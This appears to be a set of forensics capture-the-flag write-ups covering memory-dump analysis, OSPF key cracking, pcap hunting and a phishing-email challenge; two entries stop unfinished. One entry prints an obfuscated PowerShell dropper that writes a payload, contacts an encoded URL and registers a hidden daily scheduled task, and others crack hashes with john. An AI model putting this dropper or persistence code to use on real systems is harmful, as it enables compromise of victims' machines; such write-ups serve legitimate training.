Forensics

Challenges

Secret Password Stash

I've created the best system for storing all my top-secret information. Hackers can't steal my secrets if I store them in a virtual machine, right? Unfortunately, I accidentally deleted the virtual machine. Oops! Luckily, I saved a memory capture. Can you help me recover my lost passwords?

The flag will be in format - uCTF{flag}

The first thing I had to do was extract the archive with 7z x memory.7z, which blew up from 270MB to a gigabyte. Then since this is memory, my first thought was to spin up Volatility3, but I decided to go through some initial triage steps before jumping in:

  1. strings -e l memory.dmp > secret_password_stash_strings.log

    A pre-Volatility step, always a good one to take to get a fair idea of what the data you're working with contains before doing a deep dive. Looking at the logs, one thing that caught my attention and appeared multiple times is C:\Users\admin\Desktop\note_to_self.txt. One of the times, on line 527,696, it appeared next to a Password Safe.lnk, which might mean that there is an Alternate Data Stream at play.

    Continuing to parse through, we can see one of the occurrences by \Device\HarddiskVolume2\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\super_secret_passwords.psafe3.lnk. Eventually we find the true path for this as C:\Users\admin\Documents\My Safes\super_secret_passwords.psafe3, and a backup at C:\Users\admin\Documents\My Safes\super_secret_passwords_001.ibak.

    I think we have enough information to have a good idea of where to start looking with Volatility.

  2. ./vol.py -f memory.dmp windows.filescan | grep passwords

    When I ran the plain filescan command, there were a TON of results, so I decided to filter it down to the files that we know we are interested in. We got the file offsets from this:

    0x3e1745d0 100.0\Users\admin\Documents\My Safes\super_secret_passwords.psafe3   216
    0x3fc36070      \Users\admin\Documents\My Safes\super_secret_passwords.plk      216
    0x3fe1d8f0      \Users\admin\Documents\My Safes\super_secret_passwords_001.ib   216
    

    And we can also go ahead and get the offset for the note_to_self.txt file with the same technique while we're at it:

    0x3e054f20 100.0\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\note_to_self.lnk  216
    0x3fc6c180      \Users\admin\Desktop\note_to_self.txt   216
    
  3. ./vol.py -f memory.dmp -o ./dumped_files windows.dumpfiles.DumpFiles --physaddr 0x3e1745d0

    Also ran it with offset 0x3fc6c180 to get the note and 0x3fc36070 in case the .psafe3 wasn't the only useful file. The note to self just had the text thequickbrownfoxjumpedoverthelazydog, which is typically used for testing a font since it has all the letters of the alphabet in it. The .psafe3 file looks like gibberish, so we know it's either corrupted or encrypted, and that the string in the note may be the password we're looking for.

I grabbed the relevant software from Password Safe, opened the .psafe3 file, and entered the password, and we got the flag!

Answer: uCTF{Suppa_secret_pa$$word}

Crack my OSPF

You’ve been tasked with auditing the network at Big Corporation. We need you to obtain the OSPF authentication key being used by the router with the router ID of 172.31.2.56

The flag is simply the cleartext key

If the download here doesn't work (it's a BIG file for CTFd), you can download from http://files.dataspot.space/all.7z

First step is extracting the all.7z file, which gives us a 950MB all.pcap file. Goodie goodie!

The first thing I tried to do was use ip.addr == 172.31.2.56 as a filter to ensure we were only looking at relevant packets, but there were no hits. Next I used ospf as a filter, and that one had more luck. To filter down to the IP of interest, we can use ospf.srcrouter == 172.31.2.56.

I then followed the instructions for OSPFMD5Crack, which were:

  1. Export the filtered traffic to a .pcap file

  2. ettercap -Tqr ./all/ospf.pcap > raw-hashes.txt

    Be sure to have the PCAP file saved as a .pcap, because the Ettercap tool doesn't work with the .pcapng file format.

  3. cat raw-hashes.txt | cut -d ":" -f 2 >> net-md5-hashes.txt

  4. john net-md5-hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt

    You may need to do sudo gunzip /usr/share/wordlists/rockyou.txt.gz if you are on a new Kali instance and haven't extracted the Rockyou wordlist yet. To show the passwords a second time, do john --show net-md5-hashes.txt.

Answer: missingyou

Stolen Flights

No story to this one...just need the password for "Tom Fedder"

Stolen_flights.pcapng

The first thing I did upon opening the PCAP was search for frame contains "Tom" and frame contains "Fedder", neither of which had any hits. Next I filtered to http and saw a lot of good traffic, so my guess is that's the protocol of interest in this challenge.

The first interesting HTTP traffic was in packet 783, because it was to https://boardreader.com/. Before going any filter, the OSCP traffic was just noise that I am not interested in, so I changed the active filter to http and not ocsp to further narrow down the search space. I did the same thing by expanding even more to http and not ocsp and not http.host contains "ocsp" to remove additional OCSP traffic from the results.

I decided to start looking at the cookies in the Baidu traffic, but initially wasn't able to make any sense of the cookie pairs. But there is a file called every_cookie_4644b13.js in packet 50,752 that looks like it might be able to explain it to us, so I went ahead and exported the file and made it pretty. After formatting and giving it a thorough read, I didn't see anything that was going to get us useful information out of the cookie pairs, so I moved on.

Trying frame contains "pass" in case there were any "password" or "passwd" strings didn't tield anything super interesting, except possibly tcp.stream eq 633. Following the HTTP stream shows a good bit of data transfer, most of it appearing to be related to Baidu's website.

I tried filtering down to http.cookie to only look at the traffic that would potentially have authentication-related information...

It's In There Somewhere...

This one is layered like that cake at Cheesecake Factory....

the flag will be in the format: HTB{flag}

supercraft.eml

The first thing I noticed is that this challenge looks exactly like one I worked on this past weekend in the HTB Business CTF! Unfortunately I didn't get around to solving the final stint of that challenge... but I did find a write-up that went over the last bit of methodology for it!

These are the steps I took to solve this challenge:

  1. Open the .eml file in Outlook and save the attachment

  2. Open the attachment and a .zip file will automatically download

  3. Extract the JavaScript file from the .zip archive

  4. Run the JavaScript and print the value of the variable hfhwsgmb after the line hfhwsgmb = uwetjyhi.replace(/[sV]/g,'')

  5. Paste the result in CyberChef and decode it as hex

  6. Scroll down to the definition of ynvjonvw and add console.log(ynvjonvw) right after, then run the code in console

  7. Get the PowerShell command from the variable:

    PoweRShElL -EXEcU  byPAss    'IEx(NEW-oBJeCT  SYsTeM.iO.COmpResSion.dEfLaTestReAm( [SySTem.IO.meMOrYStReAm] [convert]::FromBase64String(''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''),[SyStEM.IO.COMPreSSION.cOMPRessIONmodE]::DECOMPReSS)| FOrEach{NEW-oBJeCT  iO.sTReAMREaDEr( $_,[SYsTeM.TExt.eNcodiNg]::AsCii ) } ).reaDTOEnd( )'
    
  8. Decode the PowerShell with the following:

    $base64data = "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"
    $data = [System.Convert]::FromBase64String($base64data)
    $ms = New-Object System.IO.MemoryStream
    $ms.Write($data, 0, $data.Length)
    $ms.Seek(0,0) | Out-Null
    
    $sr = New-Object System.IO.StreamReader(New-Object System.IO.Compression.DeflateStream($ms, [System.IO.Compression.CompressionMode]::Decompress))
    
    while ($line = $sr.ReadLine()) {  
        $line
    }
    
  9. Decode the result of the command by printing the value of the variable EUMLmXNYuGSWAb:

    SET-ItEM ("VAr"+"Ia"+"B"+"le:4z0")  ([TypE]("{2}{3}{1}{0}" -f'odinG','.enC','sYSTEm.T','ext')  )  ;   sv  IgF  (  [TypE]("{1}{0}{2}{3}" -f'OnVe','SYsTEM.c','r','T')  )  ;sV ('5EV'+'lS') ([type]("{1}{2}{0}" -F 'E','Io','.fIL'))  ;  &("{4}{1}{3}{0}{2}"-f 'ri','et-','ctMode','St','S') -Version 2
    function UYc`xq (${TN`me},${Chk`go`Iul}) {
        for (${eum`lMx`NyUg} = 0; ${eu`mL`MxNYug} -lt ${T`NME}."c`OUnt"; ${Eu`MLMx`NyUG}++) {
          ${T`NME}[${eUM`lM`XnyuG}] = (${t`NmE}[${eUm`Lmx`N`yuG}] -bxor ${c`HKGo`iUl})
        }
        return  ( gEt-vaRIAble ("4"+"Z0")  -VaL)::"As`Cii"."gETs`T`RIng"(${tN`Me})
    }
    function Rc`DAt`CaJT {return (1..16 | .('%'){ '{0:X}' -f (&("{0}{2}{1}" -f 'Ge','andom','t-R') -Max 16) }) -join ''}
    ${E`UM`lm`XNy`UGzzOO} = (&("{0}{1}" -f 'UyC','xq') ([System.Byte[]] @(0x0a,0x16,0x16,0x12,0x58,0x4d,0x4d,0x11,0x16,0x0d,0x0e,0x07,0x0c,0x12,0x0e,0x03,0x0c,0x11,0x4c,0x0a,0x16,0x00,0x4d,0x10,0x4d)) 98)
    ${suQ`QsIgl} = (.("{1}{0}" -f 'Cxq','Uy') ([System.Byte[]] @(0x31,0x3c,0x36)) 80)
    ${X`s`xnap`VE} = (&("{1}{0}"-f'xq','UyC') ([System.Byte[]] @(0x42,0x13,0x7d,0x4c,0x4c,0x78,0x5d,0x48,0x5d,0x13,0x70,0x53,0x5f,0x5d,0x50,0x13,0x71,0x55,0x5f,0x4e,0x53,0x4f,0x53,0x5a,0x48,0x13,0x6b,0x55,0x52,0x58,0x53,0x4b,0x4f,0x13,0x6c,0x53,0x4b,0x59,0x4e,0x6f,0x54,0x59,0x50,0x50,0x13)) 60)
    &('cd') ${XSx`NAp`Ve}
    ${cyR`YX`whqM} = (.("{1}{2}{0}" -f 't','R','cDATCAJ'))+(.("{0}{1}"-f 'UyC','xq') ([System.Byte[]] @(0x67,0x3f,0x2b,0x3a)) 73)
    ${N`yNG} = (.("{1}{0}" -f 'd','pw')).("{0}{1}{2}" -f 'ToStr','i','ng').Invoke() + '\' + ${cyRYXw`H`qM}
    ${WbwM`g`QB} = (.("{2}{1}{0}"-f 'Jt','TCA','RcDA')) + (.("{3}{1}{2}{0}" -f'Jt','AT','CA','RcD'))
    ${u`JRW} = $(.("{0}{1}" -f 'whoa','mi'))
    ${EUMLmX`NYuGS`WAb`lOEP} = (.("{1}{0}"-f'yCxq','U') ([System.Byte[]] @(0x5d,0x7d,0x45,0x3d,0x4d,0x42,0x60,0x50,0x5d,0x37,0x4e,0x74,0x67,0x4c,0x55,0x71,0x55,0x5c,0x4e,0x6a,0x60,0x53,0x35,0x68,0x66,0x6a,0x56,0x7e,0x4f,0x40,0x45,0x74,0x47,0x6a,0x4a,0x68,0x60,0x47,0x46,0x7e,0x4d,0x40,0x34,0x63,0x55,0x37,0x4e,0x68,0x5d,0x5c,0x56,0x68,0x50,0x36,0x4e,0x75,0x5e,0x53,0x4a,0x34,0x4f,0x47,0x4e,0x5c,0x51,0x36,0x4a,0x7d,0x65,0x5c,0x46,0x34,0x48,0x68,0x4a,0x6b,0x5e,0x53,0x7c,0x77,0x4d,0x6d,0x6f,0x4f,0x67,0x7d,0x31,0x57,0x60,0x53,0x30,0x63,0x4d,0x6a,0x46,0x72,0x60,0x36,0x52,0x7d,0x67,0x36,0x6c,0x68,0x66,0x43,0x73,0x71,0x5e,0x5c,0x6c,0x68,0x4d,0x47,0x35,0x68,0x61,0x43,0x52,0x6e,0x4d,0x43,0x4e,0x31,0x67,0x43,0x42,0x7e,0x67,0x7d,0x45,0x6d,0x4d,0x47,0x5d,0x63,0x5d,0x7d,0x73,0x73,0x47,0x63,0x39,0x39)) 4);
    ${r`ERbWtRv} =  $igf::("{1}{3}{0}{2}{4}"-f 'ase64','From','Strin','B','g').Invoke(${eu`ml`MXny`UgsW`ABl`OEp})
      (get-VariAbLe ('5EV'+'LS')  -Va)::("{1}{2}{0}" -f'ytes','wri','teallb').Invoke(${N`ynG},${ReR`Bw`TRV});
    ${as`kz`pH`UpAj} = (.("{0}{1}"-f'p','wd')).("{0}{1}{2}"-f'ToStr','in','g').Invoke() + '\'
    ${vQp`SBX`gyj} = (&("{3}{0}{2}{1}" -f 'cD','Jt','ATCA','R'))
    ${a`etR`sd`f} = (&("{2}{1}{0}" -f 'q', 'cx', 'UY') ([System.Byte[]] @(0x97,0x8b,0x9d,0xa4,0xb3,0xef,0xab,0xac,0x80,0xb0,0xb9,0x80,0xb3,0xeb,0x86,0xec,0xad,0xac,0x80,0xb6,0x91,0x80,0xab,0xb7,0xeb,0xab,0x80,0xee,0xa2)) 223)
    ${t`kqr`mLSfPD} = '"' + (&("{1}{0}"-f 'xq','UyC') ([System.Byte[]] @(0x22,0x2e,0x33,0x6b,0x63,0x22,0x3c,0x39,0x6b,0x66,0x3e,0x38,0x2e,0x29,0x6b)) 75) + "$eUmLmxNYuGZZoO$suqqSiGL/$vQpsbXGyj)" + '"'
    
    # Add your debugging code here, don't run the stuff below that will actually create the task!
    Write-Host "$aSKZpHuPaj$cyrYXWhqM"
    Write-Host ${t`kqr`mLSfPD}
    Write-Host ${a`etR`sd`f}
    
    ${eRQ`cf} = &("{1}{4}{3}{6}{2}{5}{0}"-f'TaskAction','New-S','le','e','ch','d','du') -Execute "$aSKZpHuPaj$cyrYXWhqM" -Argument ${Tk`Q`Rmls`FpD}
    ${tpNDJP`w`Aa} = .("{1}{2}{0}{4}{6}{3}{5}"-f'h','New-S','c','edTaskPrin','edu','cipal','l') "$UJrw"
    ${aIuf`d`yWasr} = .("{4}{1}{5}{2}{0}{3}" -f'igge','w-Sche','askTr','r','Ne','duledT') -Once -At (&("{0}{1}"-f 'Get-D','ate')).AddDays(1) -RepetitionInterval (&("{1}{2}{0}" -f'pan','New-Time','S') -Days 1) -RepetitionDuration (.("{1}{2}{3}{0}"-f'n','New-Ti','meS','pa') -Days(365))
    ${d`wtTAWqx} = .("{5}{4}{0}{6}{1}{3}{2}" -f 'ledT','skS','ttingsSet','e','w-Schedu','Ne','a') -Hidden -MultipleInstances ("{0}{2}{1}" -f'Par','el','all') -AllowStartIfOnBatteries
    .("{2}{1}{3}{4}{6}{0}{5}"-f 'T','egis','R','ter-','Sche','ask','duled') -TaskName ${WbWm`g`Qb} -Action ${Er`qcf} -Trigger ${AI`Uf`dY`WASr} -Settings ${dW`TTAWqx}
    

Answer: HTB{l0ts_of_l4Y3rs_iN_th4t_1}; 500 points

Deep Six

Another one with really no story behind it....just find the flag.

Flag will be in the format: CCT{flag}

pcap1_v2.pcapng

When opening the PCAP, the first odd thing I notice is that the data protocol is USB, which I haven't had to work with before. So I Googled how to work with it and found these tips for how to get started.

My first step was to git clone https://github.com/carlospolop-forks/ctf-usb-keyboard-parser to my tools directory, then I attempted to extract the keystrokes from the PCAP via tshark:

tshark -r ./pcap1_v2.pcapng -Y 'usb.capdata && usb.data_len == 8' -T fields -e usb.capdata > usb-hex-commands.txt

Unfortunately for us, the output was blank! I tried converting our .pcapng to a .pcap and trying again, but no dice. I looked at the suggestions in this article and he said to skim the raw data, so I did that with the final large packet, and was able to see something right off the bat:

pcap_chall.pcap

I tried looking for keystrokes with usb.transfer_type == 0x01 as suggested here, but there were no hits, so something else is going on here. In case it was easier than I was making it, I searched for frame contains "CCT", but unfortunatly there were no hits.

One idea is to use usbrply to attempt to convert the binary data into Python commands, so I gave it a shot:

git clone https://github.com/JohnDMcMaster/usbrply.git
cd usbrply
sudo python setup.py install
usbrply --wrapper --device-hi -p pcap1_v2.pcapng > replay.py

But unfortunately it errored out with Exception: Failed to guess vid/pid: found 0 device entries. I made an issue on GitHub here to at least bring it to the author's attention, but I'm moving forwards without it.

Next I dug into what URB_BULK actually means, and it turns out it's file transfer data. So I tried the following tshark command to get all the data transferred in:

tshark -r pcap1_v2.pcapng -Y 'usb.capdata and usb.endpoint_address.direction == 1' -T fields -e usb.capdata | tr -d '\n' > rawdata

Because I saw something similar used here, and we got access to the raw data! The next step is converting our hex data to binary:

sudo apt install xxd
xxd -r -p rawdata binarydata.bin

And we got the output, but it was mostly gibberish aside from a few mentions of pcap_chal.pcap again. I decided to give binwalk a go to see if we can carve out any files:

sudo binwalk -Me binarydata.bin --run-as=root

And it worked!

extracted_binary_data

Inside the PCAP, I was able to extract an image from fotoforensics.com:

fotoforensics

I tried uploading the image on FotoForensics to see if there was anything hidden in there, but the upload-file.php file was down or I was banned or something. I tried steghide extract -sf ./_binarydata.bin-0.extracted/fotoforensics.png to see if there was something embedded, but steghide doesn't work with .png images.

I tried doing a second binwalk on the PNG image with the following:

sudo binwalk -Me ./_binarydata.bin-0.extracted/fotoforensics.png --run-as=root

And it pulled out a 101KB .zlib file, which is usually indicative of a false positive. I tried to extract it anyways, just in case:

sudo apt install pigz
unpigz ./_binarydata.bin-0.extracted/_fotoforensics.png-0.extracted/3E.zlib

But no such luck. I reached out to one of the challenge creators to see if I was on the right track, but they told me the image was a red herring and that there was other traffic of interest in the PCAP that I should direct my attention to.

I decided to start clicking through all the TCP streams to see if there was anything noteworthy in them, to try to reduce the search space.

I did notice a lot of "Application Data" being transferred via the TLSv1.3 protocol (especially in stream 31), but since it's all encrypted, I don't think there's anything we can do with it.

TCP stream 52 had a password being passed in cleartext via IRC:

:irc.cct NOTICE Auth :*** Looking up your hostname...
CAP LS 302
PASS RedRoverRedRover$$
NICK zoobah
USER binaryphalanx 2 * :binaryphalanx
:irc.cct NOTICE Auth :*** Could not resolve your hostname: Request timed out; using your IP address (192.168.55.64) instead.
:irc.cct NOTICE Auth :Welcome to .Localnet.!
:irc.cct 001 zoobah :Welcome to the Localnet IRC Network zoobah!binaryphala@192.168.55.64
:irc.cct 002 zoobah :Your host is irc.cct, running version InspIRCd-2.0
:irc.cct 003 zoobah :This server was created on Debian
:irc.cct 004 zoobah irc.cct InspIRCd-2.0 iosw biklmnopstv bklov
:irc.cct 005 zoobah AWAYLEN=200 CASEMAPPING=rfc1459 CHANMODES=b,k,l,imnpst CHANNELLEN=64 CHANTYPES=# CHARSET=ascii ELIST=MU FNC KICKLEN=255 MAP MAXBANS=60 MAXCHANNELS=20 MAXPARA=32 :are supported by this server
:irc.cct 005 zoobah MAXTARGETS=20 MODES=20 NETWORK=Localnet NICKLEN=32 PREFIX=(ov)@+ STATUSMSG=@+ TOPICLEN=307 VBANLIST WALLCHOPS WALLVOICES :are supported by this server
:irc.cct 042 zoobah 108AAAAAC :your unique ID
:irc.cct 375 zoobah :irc.cct message of the day
:irc.cct 372 zoobah :- Welcome to the CCT Test Server for the PCAP assessment!
:irc.cct 376 zoobah :End of message of the day.
:irc.cct 251 zoobah :There are 1 users and 0 invisible on 1 servers
:irc.cct 254 zoobah 0 :channels formed
:irc.cct 255 zoobah :I have 1 clients and 0 servers
:irc.cct 265 zoobah :Current Local Users: 1  Max: 1
:irc.cct 266 zoobah :Current Global Users: 1  Max: 1

This also just so happened to be the only packet that showed up when I filtered on frame contains "CCT". I tried submitting both CCT{binaryphalanx} and CCT{RedRoverRedRover$$} as flags, but neither was correct.

I did a little OSINT and determined that Zoobah is likely the username of the person who created the challenge. Unfortunately, searching for "zoobah" + RedRoverRedRover didn't yield any results. We were able to determine that the challenge was pulled from this TryHackMe room, and from there could look up some additional strategies for solving the challenge.

The hint I found was something I had considered looking in to earlier, but had forgotten about. Most standard ICMP traffic follows a similar format, so anything that doesn't would be considered anomalous. So I wrote an ICMP filter to ignore the boilerplate packets and only show the ones that were anomalous:

icmp and !(data.data contains 101112131415161718191a1b1c1d1e1f202122232425262728292a2b2c2d2e2f3031323334353637)

We can pivot off of the information we found and extract the content of the ICMP packets via tshark:

tshark -r pcap_chal.pcap -Y "icmp and icmp.ident == 31337" -T fields -e data.data

But upon doing this, all the data is in hexadecimal format. So we can pipe the output to xxd to convert it to ASCII:

$ tshark -r pcap_chal.pcap -Y "icmp and icmp.ident == 31337" -T fields -e data.data | xxd -r -p
bro, what you up to?n2mhwhy?you didn't send that thing yetoh... well, not over thisif not this, then what?let's use cryptcat insteadanother thing to install?man... no one can see thisstill... rather use encryptionwe need to pick a key to useI know just the oneAngela Bennett uses it to log into the Bethesda Naval HospitalWhat? Oh, that old thing?Hang on, lemme look it upokay, I found it. use the metasploit port to receivelistener is up. send it.okay, it's sent7181f4d45de00ae35b6cf8201c8d852bhash is good

The information from this convo that we care about is the hash 7181f4d45de00ae35b6cf8201c8d852b, which we can run through Name That Hash to confirm that it's an MD5, or raw-md5 in John. We can try to crack it with john:

echo 7181f4d45de00ae35b6cf8201c8d852b > hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt --format=raw-md5

But there were no results, indicating that this likely isn't a password, or at least not a common one. We also know that they said they would be using the Metasploit port to receive, which is port 4444. So we can filter the traffic down to just that port and see if there's anything interesting:

tcp.port == 4444

Applying the data.data as a column makes the data easier to visualize. When we do that, we can see that the data is coming from the remote IP 192.168.55.187, so we can apply that as a filter as well to further narrow down the data we're looking at. All the data can be extracted via tshark:

